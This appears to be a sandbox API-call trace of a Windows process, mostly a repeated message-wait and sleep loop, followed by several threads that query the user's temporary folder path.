MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.708] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0288.724] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.833] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0288.848] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.958] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0288.973] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.083] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0289.099] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.207] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0289.223] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.332] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0289.348] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.457] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0289.473] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.582] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0289.597] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.707] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0289.722] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.831] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0289.847] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.956] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0289.972] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.081] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0290.099] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.206] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0290.221] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.330] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0290.346] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.455] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0290.471] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.580] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0290.596] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.705] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0290.720] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.830] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0290.845] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.955] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0290.970] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.079] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0291.095] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.204] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0291.219] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.329] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0291.344] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.454] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0291.469] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.579] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0291.594] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.706] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0291.719] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.828] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0291.844] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.953] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0291.968] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.078] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0292.094] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.203] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0292.218] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.327] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0292.343] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.452] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0292.468] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.577] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0292.593] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.702] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0292.717] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.828] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0292.842] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.951] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0292.967] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.076] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0293.092] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.201] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0293.216] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.326] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0293.341] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.450] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0293.466] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.577] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0293.591] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.700] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0293.716] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.834] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0293.840] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.950] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0293.968] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.075] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0294.090] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.199] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0294.215] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.324] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0294.340] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.449] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0294.464] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.574] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0294.589] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.699] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0294.714] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.823] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0294.849] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.948] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0294.964] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.076] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0295.089] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.198] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0295.213] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.323] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0295.338] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.447] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0295.463] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.580] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0295.587] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.697] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0295.713] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.822] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0295.837] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.946] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0295.962] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0296.079] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0296.087] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0296.196] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0296.211] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0296.321] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0296.336] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0296.446] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0296.461] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0296.573] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0296.586] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0296.696] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0296.711] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0296.820] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0296.836] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0296.945] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0296.960] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0297.070] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0297.085] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0297.195] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0297.210] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0297.320] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0297.335] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0297.444] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0297.460] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0297.569] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0297.584] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0297.694] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0297.709] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0297.819] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0297.834] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0297.944] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0297.959] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0298.068] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0298.084] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0298.193] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0298.208] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0298.324] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0298.333] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0298.443] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0298.458] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0298.567] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0298.583] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0298.692] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0298.708] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0298.817] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0298.832] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0298.942] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0298.957] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0299.067] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0299.087] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0299.192] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0299.207] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0299.317] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0299.332] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0299.441] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0299.456] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0299.566] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0299.581] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0299.691] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0299.706] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0299.815] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0299.831] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0299.940] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0299.956] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.065] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0300.081] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.190] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0300.205] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.315] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0300.330] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.439] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0300.455] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.564] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0300.580] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.689] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0300.704] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.814] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0300.829] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.939] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0300.954] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0301.063] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0301.079] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0301.188] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0301.204] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0301.313] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0301.328] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0301.438] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0301.453] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0301.563] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0301.578] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0301.687] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0301.703] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0301.812] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0301.828] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0301.937] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0301.952] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0302.062] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0302.077] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0302.187] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0302.202] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0302.311] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0302.327] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0302.436] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0302.452] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0302.561] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0302.576] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0302.686] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0302.710] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) Thread: id = 230 os_tid = 0x5ac [0234.772] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0234.779] CoTaskMemAlloc (cb=0x20c) returned 0x7f67f0 [0234.779] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7f67f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0234.779] CoTaskMemFree (pv=0x7f67f0) [0234.779] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x5f5dc2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x25 [0234.803] CoUninitialize () Thread: id = 231 os_tid = 0x724 [0234.807] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0234.816] CoTaskMemAlloc (cb=0x20c) returned 0x7f7010 [0234.816] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7f7010 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0234.816] CoTaskMemFree (pv=0x7f7010) [0234.816] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x605dba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x25 [0234.879] CoUninitialize () Thread: id = 232 os_tid = 0x440 [0234.883] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0234.899] CoUninitialize () Thread: id = 233 os_tid = 0x720 [0234.912] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0234.922] CoTaskMemAlloc (cb=0x20c) returned 0x7f8470 [0234.922] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7f8470 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 